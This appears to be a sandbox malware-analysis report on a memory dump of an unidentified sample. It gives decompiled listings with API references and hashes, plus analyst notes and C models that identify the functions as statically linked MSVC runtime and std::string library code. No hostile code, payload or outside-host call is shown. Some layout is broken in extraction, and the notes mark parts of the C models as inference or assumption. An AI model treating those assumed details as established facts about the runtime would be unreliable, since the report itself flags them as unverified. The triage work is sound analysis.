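void *flaky_alloc(size_t n)     { if (g_fail_allocs > 0) { g_fail_allocs--; return NULL; } return malloc(n ? n : 1); }
int   retry_handler(size_t n)   { (void)n; return g_retries_left-- > 0; }

int scenario_new_recovers(void)   /* one failure, one retry allowed: allocation succeeds */
{ crt_set_new_handler(retry_handler); set_retries(1); set_failing_allocs(1);
  void *p = crt_operator_new(32, flaky_alloc); free(p); return p != NULL; }
int scenario_new_gives_up(void)   /* two failures, one retry allowed: bad_alloc path taken */
{ crt_set_new_handler(retry_handler); set_retries(1); set_failing_allocs(2);
  int before = g_bad_alloc_count;
  return crt_operator_new(32, flaky_alloc) == NULL && g_bad_alloc_count == before + 1; }

/* ---- Part 2: __onexit table (what the decompiler ran into after the int3) ---- */

typedef void (*onexit_fn)(void);
#define COOKIE ((uintptr_t)0x5A5A5A5Au)   /* stand-in for the per-process EncodePointer secret */
static uintptr_t *g_begin = NULL;         /* encoded table base, like *0xa3ea74 */
static uintptr_t *g_end   = NULL;         /* encoded one-past-last, like *0xa3ea70 */
static size_t     g_cap   = 0;            /* capacity in bytes; replaces _msize() */
static uintptr_t *enc(uintptr_t *p) { return (uintptr_t *)((uintptr_t)p ^ COOKIE); }
#define dec enc                           /* XOR is its own inverse */

onexit_fn crt_onexit(onexit_fn func)
{
    if (g_begin == NULL) { g_begin = enc(NULL); g_end = enc(NULL); }   /* empty table */
    uintptr_t *begin = dec(g_begin), *end = dec(g_end);
    if (end < begin) return NULL;
    size_t used = (size_t)((char *)end - (char *)begin), need = used + sizeof *end;
    if (need < used) return NULL;                  /* the "+4 < 4" overflow check */
    if (g_cap < need) {
        /* Growth policy from the listing: add min(cap, 0x800) bytes; if that
         * overflows or realloc fails, retry with just 0x10 more bytes. */
        size_t newcap = g_cap + (g_cap < 0x800 ? g_cap : 0x800);
        uintptr_t *nb = (newcap >= need && newcap >= g_cap) ? realloc(begin, newcap) : NULL;
        if (nb == NULL) {
            newcap = g_cap + 0x10;
            if (newcap < g_cap || (nb = realloc(begin, newcap)) == NULL) return NULL;
        }
        g_cap = newcap; begin = nb; end = (uintptr_t *)((char *)begin + used);
        g_begin = enc(begin);                      /* EncodePointer(new base) */
    }
    *end = (uintptr_t)func ^ COOKIE;               /* entries are stored encoded too */
    g_end = enc(end + 1);
    return func;
}

size_t crt_onexit_count(void) { return g_begin ? (size_t)(dec(g_end) - dec(g_begin)) : 0; }

/* Constructed callbacks: record how many ran and which ran first. */
static int g_ran_a = 0, g_ran_b = 0, g_first = 0;
void cb_a(void) { if (!g_first) g_first = 1; g_ran_a++; }
void cb_b(void) { if (!g_first) g_first = 2; g_ran_b++; }
int  crt_first_run(void) { return g_first; }
size_t crt_onexit_fill(int n) { while (n-- > 0) crt_onexit(cb_b); return crt_onexit_count(); }

/* Run the table last-registered-first, as the CRT does at exit, then free it. */
int crt_run_onexit(void)
{
    if (g_begin == NULL) return 0;
    uintptr_t *begin = dec(g_begin), *end = dec(g_end);
    while (end > begin) { --end; ((onexit_fn)(*end ^ COOKIE))(); }
    free(begin); g_begin = g_end = NULL; g_cap = 0;
    return g_ran_a + g_ran_b;
}
```

The identification rests on details visible in the listing itself: the "bad allocation" string and the run-once flag at 0xa3dcc0 for the static exception object, and the 0x800 / 0x10 growth constants of the onexit table. Matching those against CRT sources is enough to set this function aside as library boilerplate during triage and spend the time on code the report's signatures actually point at.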
                                                                                                            0x00a32ef8
                                                                                                            0x00a32ef8
                                                                                                            0x00a32f0f
                                                                                                            0x00a32f12
                                                                                                            0x00a32f1a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00a32f05
                                                                                                            0x00a32f0b
                                                                                                            0x00a32f0d
                                                                                                            0x00a32f1e
                                                                                                            0x00a32f2f
                                                                                                            0x00a32f31
                                                                                                            0x00a32f31
                                                                                                            0x00a32f38
                                                                                                            0x00a32f40
                                                                                                            0x00a32f47
                                                                                                            0x00a32f51
                                                                                                            0x00a32f57
                                                                                                            0x00a32f5c
                                                                                                            0x00a32f5e
                                                                                                            0x00a32f61
                                                                                                            0x00a32f6f
                                                                                                            0x00a32f72
                                                                                                            0x00a32f77
                                                                                                            0x00a32f80
                                                                                                            0x00a32f8d
                                                                                                            0x00a32f95
                                                                                                            0x00a32f97
                                                                                                            0x00a32f9c
                                                                                                            0x00a32f9e
                                                                                                            0x00a32fa0
                                                                                                            0x00a33027
                                                                                                            0x00a33027
                                                                                                            0x00a33027
                                                                                                            0x00a32fa6
                                                                                                            0x00a32fa8
                                                                                                            0x00a32faa
                                                                                                            0x00a32fad
                                                                                                            0x00a32fb0
                                                                                                            0x00000000
                                                                                                            0x00a32fb2
                                                                                                            0x00a32fb8
                                                                                                            0x00a32fba
                                                                                                            0x00a32fbe
                                                                                                            0x00a32fc0
                                                                                                            0x00a3300a
                                                                                                            0x00a3300d

APIs
• _malloc.LIBCMT ref: 00A32F12
  • Part of subcall function 00A33403: __FF_MSGBANNER.LIBCMT ref: 00A3341C
  • Part of subcall function 00A33403: __NMSG_WRITE.LIBCMT ref: 00A33423
  • Part of subcall function 00A33403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00A3484E,00000000,00000001,00000000,?,00A3387D,00000018,00A3B658,0000000C,00A3390D), ref: 00A33448
• std::exception::exception.LIBCMT ref: 00A32F47
• std::exception::exception.LIBCMT ref: 00A32F61
• __CxxThrowException@8.LIBCMT ref: 00A32F72
Strings
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID: bad allocation
• API String ID: 615853336-2104205924
• Opcode ID: c548c0c97bb9554e6e45010b8d5019bad3f15abb6232a6340e412aa9665001b7
• Instruction ID: 29c6a18772b07018597f7f72a5b3f787b360341dbcbd53f46b6a85c5935fe066
• Opcode Fuzzy Hash: c548c0c97bb9554e6e45010b8d5019bad3f15abb6232a6340e412aa9665001b7
• Instruction Fuzzy Hash: FDF0AF32908209AACF14EBA4ED06A9EBAB9BF41714F100529F501A6192DFB09B12D790
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
// Decompiled function as produced by the report. Its control flow matches the
// MSVC CRT realloc pattern: a NULL pointer falls through to _malloc (E00A33403,
// named in the API list for this entry), a zero size frees the block (E00A3352B
// is _free per the same list), and requests larger than 0xffffffe0 (_HEAP_MAXREQ)
// fail with errno 0xc (ENOMEM). Otherwise HeapReAlloc is retried while the
// new-handler (E00A33D86) keeps succeeding.
E00A3664D(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
    void* _t7;
    long _t8;
    intOrPtr* _t9;
    intOrPtr* _t12;
    long _t27;
    long _t30;

    if(_a4 != 0) {
        _push(__esi);
        _t30 = _a8;
        __eflags = _t30;
        if(_t30 != 0) {
            _push(__edi);
            while(1) {
                // size limit check: anything above 0xffffffe0 is rejected
                __eflags = _t30 - 0xffffffe0;
                if(_t30 > 0xffffffe0) {
                    break;
                }
                __eflags = _t30;
                if(_t30 == 0) {
                    _t30 = _t30 + 1;
                    __eflags = _t30;
                }
                _t7 = HeapReAlloc(*0xa3e8c0, 0, _a4, _t30);
                _t27 = _t7;
                __eflags = _t27;
                if(_t27 != 0) {
                    L17:
                    _t8 = _t27;
                } else {
                    __eflags = *0xa3e8c4 - _t7;
                    if(__eflags == 0) {
                        // map the Win32 error into errno and return NULL
                        _t9 = E00A34264(__eflags);
                        *_t9 = E00A34222(GetLastError());
                        goto L17;
                    } else {
                        __eflags = E00A33D86(_t7, _t30);
                        if(__eflags == 0) {
                            _t12 = E00A34264(__eflags);
                            *_t12 = E00A34222(GetLastError());
                            L12:
                            _t8 = 0;
                            __eflags = 0;
                        } else {
                            continue;
                        }
                    }
                }
                goto L14;
            }
            E00A33D86(_t6, _t30);
            // errno = 0xc (ENOMEM)
            *((intOrPtr*)(E00A34264(__eflags))) = 0xc;
            goto L12;
        } else {
            // size == 0: free the block and return NULL
            E00A3352B(_a4);
            _t8 = 0;
        }
        L14:
        return _t8;
    } else {
        // NULL pointer: behave like malloc(size)
        return E00A33403(__edx, __edi, __esi, _a8);
    }
}

APIs
• _malloc.LIBCMT ref: 00A3665B
  • Part of subcall function 00A33403: __FF_MSGBANNER.LIBCMT ref: 00A3341C
  • Part of subcall function 00A33403: __NMSG_WRITE.LIBCMT ref: 00A33423
  • Part of subcall function 00A33403: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00A3484E,00000000,00000001,00000000,?,00A3387D,00000018,00A3B658,0000000C,00A3390D), ref: 00A33448
• _free.LIBCMT ref: 00A3666E
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
• API String ID: 1020059152-0
• Opcode ID: 3b88fde873793812841fba8bf5669a0301d6dcbab0af5d5318309c06a5bfdf9e
• Instruction ID: edcb936715fb05da760c6c7c004ef8017b07f8d9aaba292fa0260d41b904b4d0
• Opcode Fuzzy Hash: 3b88fde873793812841fba8bf5669a0301d6dcbab0af5d5318309c06a5bfdf9e
• Instruction Fuzzy Hash: 49115933409A04BBCF297FB4BD0669B3BA4AF453F1F20C529F845AA1A0DB70CC4087A4
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
E00A35AFA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    signed int _t12;
    void* _t28;
    intOrPtr _t29;
    void* _t30;
    void* _t31;

    _t31 = __eflags;
    _t26 = __edi;
    _t25 = __edx;
    _t20 = __ebx;
    _push(0xc);
    _push(0xa3b748);
    E00A34440(__ebx, __edi, __esi);
    _t28 = E00A33F5E(__ebx, __edx, __edi, _t31);
    _t12 = *0xa3db20; // 0xfffffffe
    if((*(_t28 + 0x70) & _t12) == 0) {
        L6:
        E00A338F2(_t20, 0xc);
        *(_t30 - 4) = *(_t30 - 4) & 0x00000000;
        _t29 = _t28 + 0x6c;
        *((intOrPtr*)(_t30 - 0x1c)) = E00A35AAD(_t29, *0xa3d5e8);
        *(_t30 - 4) = 0xfffffffe;
        E00A35B67();
    } else {
        _t33 = *((intOrPtr*)(_t28 + 0x6c));
        if(*((intOrPtr*)(_t28 + 0x6c)) == 0) {
            goto L6;
        } else {
            _t29 = *((intOrPtr*)(E00A33F5E(_t20, __edx, _t26, _t33) + 0x6c));
        }
    }
    _t34 = _t29;
    if(_t29 == 0) {
        _push(0x20);
        E00A32EDA(_t25, _t26, _t29, _t34);
    }
    return E00A34485(_t29);
}
• Instruction addresses: 0x00a35afa .. 0x00a35b60 (per-line address column of the listing above; its pairing with the code lines was lost in extraction)

APIs
• __getptd.LIBCMT ref: 00A35B06
  • Part of subcall function 00A33F5E: __getptd_noexit.LIBCMT ref: 00A33F61
  • Part of subcall function 00A33F5E: __amsg_exit.LIBCMT ref: 00A33F6E
• __getptd.LIBCMT ref: 00A35B1D
• __amsg_exit.LIBCMT ref: 00A35B2B
• __lock.LIBCMT ref: 00A35B3B
• __updatetlocinfoEx_nolock.LIBCMT ref: 00A35B4F
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 09129bf71b100b0263bfe1c1fe6eac2e56a1001f871b39f952db141da515139f
• Instruction ID: 08690ae64c0a6ed6a6f23d065e7165a7cb4cff0428773f101832a791dce21cf3
• Opcode Fuzzy Hash: 09129bf71b100b0263bfe1c1fe6eac2e56a1001f871b39f952db141da515139f
• Instruction Fuzzy Hash: 7BF0B432D05B10DBDB21BF7CAA03B4DB7A0AF04724F114109F054AB2D2DB2459418A95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00A314F0(void* __ebx, intOrPtr* __ecx, intOrPtr* _a4) {
	void* __esi;
	signed int _t14;
	intOrPtr _t15;
	intOrPtr* _t17;
	char* _t23;
	void* _t34;
	intOrPtr* _t36;
	intOrPtr _t41;
	signed int _t42;
	intOrPtr* _t48;

	_t34 = __ebx;
	_t48 = __ecx;
	_t36 = _a4;
	_t41 =  *((intOrPtr*)(_t36 + 0x10));
	if(_t41 < __ebx) {
		_t14 = E00A32693("invalid string position");
	}
	_t42 = _t41 - _t34;
	if(_t14 < _t42) {
		_t42 = _t14;
	}
	if(_t48 != _t36) {
		if(_t42 > 0xfffffffe) {
			E00A32646("string too long");
		}
		_t15 =  *((intOrPtr*)(_t48 + 0x14));
		if(_t15 >= _t42) {
			if(_t42 != 0) {
				goto L10;
			} else {
				 *(_t48 + 0x10) = _t42;
				if(_t15 < 0x10) {
					_t23 = _t48;
					 *_t23 = 0;
					return _t23;
				} else {
					 *((char*)( *_t48)) = 0;
					return _t48;
				}
			}
		} else {
			E00A31690(_t48, _t42,  *(_t48 + 0x10));
			_t36 = _a4;
			if(_t42 == 0) {
				L22:
				return _t48;
			} else {
				L10:
				if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
					_t36 =  *_t36;
				}
				if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
					_t17 = _t48;
				} else {
					_t17 =  *_t48;
				}
				E00A353B0(_t17, _t36 + _t34, _t42);
				 *(_t48 + 0x10) = _t42;
				if( *((intOrPtr*)(_t48 + 0x14)) < 0x10) {
					 *((char*)(_t48 + _t42)) = 0;
					goto L22;
				} else {
					 *((char*)( *_t48 + _t42)) = 0;
					return _t48;
				}
			}
		}
	} else {
		E00A31620(_t14 | 0xffffffff, _t42 + _t34, _t48);
		E00A31620(_t34, 0, _t48);
		return _t48;
	}
}

• Instruction addresses: 0x00a314f0 .. 0x00a315c5 (per-line address column of the listing above; its pairing with the code lines was lost in extraction)

APIs
• std::_Xinvalid_argument.LIBCPMT ref: 00A31506
  • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326A8
  • Part of subcall function 00A32693: __CxxThrowException@8.LIBCMT ref: 00A326BD
  • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326CE
• std::_Xinvalid_argument.LIBCPMT ref: 00A3153D
  • Part of subcall function 00A32646: std::exception::exception.LIBCMT ref: 00A3265B
  • Part of subcall function 00A32646: __CxxThrowException@8.LIBCMT ref: 00A32670
  • Part of subcall function 00A32646: std::exception::exception.LIBCMT ref: 00A32681
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Similarity
• API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 1823113695-4289949731
• Opcode ID: 22ed01a793dcc62ec9c039d7a531c3184a9702a613806080d1aa89a11ea2a3f6
• Instruction ID: 8d9484e5bca598f46d42170ccc0d324b9cbd5e6b79df5f1c2017f4000020cfbd
• Opcode Fuzzy Hash: 22ed01a793dcc62ec9c039d7a531c3184a9702a613806080d1aa89a11ea2a3f6
• Instruction Fuzzy Hash: 8A2191323006108BC7219B6DE841A6AF7A9EBE1761F14093EF152CB281D771DC4183A5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
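Triage note for the listing above: E00A314F0 (and the E00A32530 routine that follows it) is compiler-library code rather than sample-specific logic. The field offsets (+0x10 size, +0x14 capacity, 16-byte inline buffer selected when capacity is below 0x10) together with the "invalid string position" and "string too long" messages match the 32-bit MSVC STL std::string assign/append helpers; this is an inference from the listing, not something the report states. The following C model is an added example, not code from the sample, the report or the MSVC STL; it mirrors the assign(right, off, count) control flow so an analyst can check the offsets and the two error paths against the decompilation. All names are hypothetical and the capacity rounding in sstr_grow is an assumption.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of the 32-bit MSVC STL std::string layout inferred from the
   decompilation: 16-byte inline buffer or heap pointer at +0x00, size at +0x10,
   capacity at +0x14. Capacity below 0x10 means the inline buffer is in use. */
typedef struct {
    union { char buf[16]; char *ptr; } u;
    uint32_t size;
    uint32_t cap;
} sstr;

#define SSTR_NPOS       0xFFFFFFFFu
#define SSTR_INLINE_CAP 15u

static char *sstr_data(sstr *s) { return s->cap < 0x10 ? s->u.buf : s->u.ptr; }
static const char *sstr_cdata(const sstr *s) { return s->cap < 0x10 ? s->u.buf : s->u.ptr; }

void sstr_init(sstr *s) { s->u.buf[0] = 0; s->size = 0; s->cap = SSTR_INLINE_CAP; }
void sstr_free(sstr *s) { if (s->cap >= 0x10) free(s->u.ptr); sstr_init(s); }

/* Stand-in for the E00A31690 call: ensure room for `need` chars, preserving `keep` chars.
   Rounding the capacity up to 16n-1 is an assumption, not something the listing shows. */
static void sstr_grow(sstr *s, uint32_t need, uint32_t keep) {
    if (need <= s->cap) return;
    if (need >= 0xFFFFFFF0u) abort();          /* guard the rounding below against wrap */
    uint32_t ncap = need | 0xFu;
    char *p = malloc((size_t)ncap + 1);
    if (p == NULL) abort();
    memcpy(p, sstr_cdata(s), keep);
    p[keep] = 0;
    if (s->cap >= 0x10) free(s->u.ptr);
    s->u.ptr = p;
    s->cap = ncap;
}

/* Test helper to build inputs from a C string (not part of the decompiled routine). */
void sstr_set(sstr *s, const char *src) {
    uint32_t n = (uint32_t)strlen(src);
    sstr_grow(s, n, 0);
    memcpy(sstr_data(s), src, n);
    sstr_data(s)[n] = 0;
    s->size = n;
}

/* erase(off, count); the self-assignment branch of E00A314F0 calls this twice. */
static void sstr_erase(sstr *s, uint32_t off, uint32_t count) {
    if (off > s->size) return;                  /* the STL would raise _Xran here */
    if (count > s->size - off) count = s->size - off;
    char *d = sstr_data(s);
    memmove(d + off, d + off + count, s->size - off - count);
    s->size -= count;
    d[s->size] = 0;
}

/* assign(right, roff, count) with the control flow of E00A314F0. Returns 0 on
   success; on failure returns -1 and sets *err to the message the STL hands to
   _Xran ("invalid string position") or _Xlen ("string too long"). */
int sstr_assign_sub(sstr *dst, const sstr *right, uint32_t roff, uint32_t count, const char **err) {
    *err = NULL;
    if (right->size < roff) { *err = "invalid string position"; return -1; }   /* E00A32693 */
    uint32_t avail = right->size - roff;
    if (count > avail) count = avail;            /* clamp count to what is left of right */
    if (dst == right) {                          /* self-assign: erase tail, then erase head */
        sstr_erase(dst, roff + count, SSTR_NPOS);
        sstr_erase(dst, 0, roff);
        return 0;
    }
    if (count > 0xFFFFFFFEu) { *err = "string too long"; return -1; }          /* E00A32646 */
    sstr_grow(dst, count, dst->size);            /* E00A31690 */
    memmove(sstr_data(dst), sstr_cdata(right) + roff, count);                   /* E00A353B0 */
    dst->size = count;
    sstr_data(dst)[count] = 0;
    return 0;
}

int main(void) {
    sstr a, b; const char *err;
    sstr_init(&a); sstr_init(&b);
    sstr_set(&a, "hello, world");                /* constructed sample input */
    sstr_assign_sub(&b, &a, 7, 5, &err);
    printf("substr -> \"%s\" (size %u, cap %u, inline=%d)\n", sstr_data(&b), b.size, b.cap, b.cap < 0x10);
    sstr_assign_sub(&b, &a, 13, 1, &err);
    printf("bad offset -> %s\n", err);
    sstr_free(&a); sstr_free(&b);
    return 0;
}
```

When you meet the same +0x10 / +0x14 / 0x10 pattern elsewhere in this dump, the function is most likely another basic_string member and can be skipped in favour of the code that calls it; the caller is where any sample-specific handling of the string data lives.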
E00A32530(void* __eax, intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
	void* __esi;
	intOrPtr _t17;
	void* _t18;
	intOrPtr _t19;
	intOrPtr* _t24;
	void* _t29;
	signed int _t30;
	intOrPtr* _t33;
	intOrPtr* _t37;
	intOrPtr _t39;

	_t37 = __edi;
	_t30 = _a8;
	_t29 = __eax;
	_t17 =  *((intOrPtr*)(_a4 + 0x10));
	if(_t17 < _t30) {
		_t17 = E00A32693("invalid string position");
	}
	_t18 = _t17 - _t30;
	if(_t18 < _t29) {
		_t29 = _t18;
	}
	_t19 =  *((intOrPtr*)(_t37 + 0x10));
	if((_t30 | 0xffffffff) - _t19 <= _t29) {
		_t19 = E00A32646("string too long");
	}
	if(_t29 == 0) {
                                                                                                            					L17:
                                                                                                            					return _t37;
                                                                                                            				} else {
                                                                                                            					_t39 = _t19 + _t29;
                                                                                                            					if(E00A315D0(_t39) == 0) {
                                                                                                            						L16:
                                                                                                            						goto L17;
                                                                                                            					} else {
                                                                                                            						_t33 = _a4;
                                                                                                            						if( *((intOrPtr*)(_t33 + 0x14)) >= 0x10) {
                                                                                                            							_t33 =  *_t33;
                                                                                                            						}
                                                                                                            						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                                            							_t24 = _t37;
                                                                                                            						} else {
                                                                                                            							_t24 =  *_t37;
                                                                                                            						}
                                                                                                            						E00A353B0( *((intOrPtr*)(_t37 + 0x10)) + _t24, _t33 + _a8, _t29);
                                                                                                            						 *((intOrPtr*)(_t37 + 0x10)) = _t39;
                                                                                                            						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                                            							 *((char*)(_t37 + _t39)) = 0;
                                                                                                            							goto L16;
                                                                                                            						} else {
                                                                                                            							 *((char*)( *_t37 + _t39)) = 0;
                                                                                                            							return _t37;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A32548
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326A8
                                                                                                              • Part of subcall function 00A32693: __CxxThrowException@8.LIBCMT ref: 00A326BD
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326CE
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A32566
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                            • String ID: invalid string position$string too long
                                                                                                            • API String ID: 963545896-4289949731
                                                                                                            • Opcode ID: 7c0512341152f993da370c7d04eb20219b19a93ed79a450280c0370a59d232cd
                                                                                                            • Instruction ID: 6cf20c5be40aa8e81c0a37d60efa1997e3d9a94db15a01e4c9251a07d9e1d798
                                                                                                            • Opcode Fuzzy Hash: 7c0512341152f993da370c7d04eb20219b19a93ed79a450280c0370a59d232cd
                                                                                                            • Instruction Fuzzy Hash: 1E1191313002019FCB08DF6DE9A1B69B3A9BF94314F54092DF516CB341E774EA54C7A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A31620(void* __eax, void* __ecx, intOrPtr* __esi) {
                                                                                                            				intOrPtr _t9;
                                                                                                            				void* _t10;
                                                                                                            				intOrPtr _t15;
                                                                                                            				intOrPtr* _t18;
                                                                                                            				void* _t22;
                                                                                                            				intOrPtr _t25;
                                                                                                            				intOrPtr* _t26;
                                                                                                            				void* _t28;
                                                                                                            				intOrPtr* _t29;
                                                                                                            
                                                                                                            				_t29 = __esi;
                                                                                                            				_t22 = __ecx;
                                                                                                            				_t28 = __eax;
                                                                                                            				_t9 =  *((intOrPtr*)(__esi + 0x10));
                                                                                                            				if(_t9 < __ecx) {
                                                                                                            					_t9 = E00A32693("invalid string position");
                                                                                                            				}
                                                                                                            				_t10 = _t9 - _t22;
                                                                                                            				if(_t10 < _t28) {
                                                                                                            					_t28 = _t10;
                                                                                                            				}
                                                                                                            				if(_t28 == 0) {
                                                                                                            					L14:
                                                                                                            					return _t29;
                                                                                                            				} else {
                                                                                                            					_t25 =  *((intOrPtr*)(_t29 + 0x14));
                                                                                                            					if(_t25 < 0x10) {
                                                                                                            						_t18 = _t29;
                                                                                                            					} else {
                                                                                                            						_t18 =  *_t29;
                                                                                                            					}
                                                                                                            					if(_t25 < 0x10) {
                                                                                                            						_t26 = _t29;
                                                                                                            					} else {
                                                                                                            						_t26 =  *_t29;
                                                                                                            					}
                                                                                                            					E00A32850(_t26 + _t22, _t18 + _t22 + _t28, _t10 - _t28);
                                                                                                            					_t15 =  *((intOrPtr*)(_t29 + 0x10)) - _t28;
                                                                                                            					 *((intOrPtr*)(_t29 + 0x10)) = _t15;
                                                                                                            					if( *((intOrPtr*)(_t29 + 0x14)) < 0x10) {
                                                                                                            						 *((char*)(_t29 + _t15)) = 0;
                                                                                                            						goto L14;
                                                                                                            					} else {
                                                                                                            						 *((char*)( *_t29 + _t15)) = 0;
                                                                                                            						return _t29;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 00A3162F
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326A8
                                                                                                              • Part of subcall function 00A32693: __CxxThrowException@8.LIBCMT ref: 00A326BD
                                                                                                              • Part of subcall function 00A32693: std::exception::exception.LIBCMT ref: 00A326CE
                                                                                                            • _memmove.LIBCMT ref: 00A31665
                                                                                                            Strings
                                                                                                            • invalid string position, xrefs: 00A3162A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                            • String ID: invalid string position
                                                                                                            • API String ID: 1785806476-1799206989
                                                                                                            • Opcode ID: 8b1f286b4fd7f73d50f42f59217624c58145e753a3f6ef03411990d23250eca2
                                                                                                            • Instruction ID: d97769163d464f3f5f37773089003a487b88dab7a5b9d6826592778976dad81e
                                                                                                            • Opcode Fuzzy Hash: 8b1f286b4fd7f73d50f42f59217624c58145e753a3f6ef03411990d23250eca2
                                                                                                            • Instruction Fuzzy Hash: 310162313006404BD7258AACED9262AB2E7DBD5704F2D4E2CF091CBB45D771DC428794
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                             			E00A37C25(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                                             				// Statically linked CRT (LIBCMT) exception-filter helper; __esi points at an x86 EXCEPTION_RECORD.
                                                                                                             				// _t29 stands for the original frame pointer (ebp); the decompiler never assigns it.
                                                                                                             				intOrPtr _t17;
                                                                                                             				intOrPtr* _t28;
                                                                                                             				void* _t29;
                                                                                                             				intOrPtr _t37; // used below but left undeclared by the decompiler
                                                                                                             				intOrPtr _t38;
                                                                                                             
                                                                                                             				_t28 = __esi;
                                                                                                             				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                             				E00A3770A(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                                             				// E00A33F5E is __getptd (see APIs below); the two stores update fields of the per-thread
                                                                                                             				// data block, probably the current-exception bookkeeping used during unwinding.
                                                                                                             				 *((intOrPtr*)(E00A33F5E(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                                             				_t17 = E00A33F5E(__ebx, __edx, __edi, __eflags);
                                                                                                             				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                                             				// ExceptionCode == 0xE06D7363 (MSVC C++ exception: 'msc' | 0xE0000000; its low bytes are the
                                                                                                             				// "csm" entry in this function's Strings list) and NumberParameters (+0x10) == 3 as on x86.
